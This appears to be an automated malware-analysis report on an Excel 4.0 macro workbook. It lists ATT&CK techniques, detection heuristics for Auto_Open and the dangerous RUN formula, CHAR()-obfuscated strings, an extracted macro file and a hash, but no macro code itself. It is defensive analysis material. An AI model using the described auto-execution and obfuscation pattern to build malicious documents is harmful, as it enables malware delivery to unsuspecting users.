Verdict: MALICIOUS
Risk Score: 140
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1203 Exploitation for Client Execution
The file is an Excel 4.0 macro-enabled workbook. Critical heuristics indicate the presence of an Auto_Open macro and the use of dangerous formula APIs, specifically RUN. This suggests the macro is designed to execute arbitrary commands or download and run a second-stage payload. The obfuscated formula in EN475, which uses CHAR() to construct strings, likely forms the command or URL for the payload.
Heuristics (3)
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 126311 bytes |

SHA-256: c8d052d01e0998e3b12269bea9d68496504e89467fe2893282c4588a2d5603d3

Preview script: first 1,000 lines of the extracted script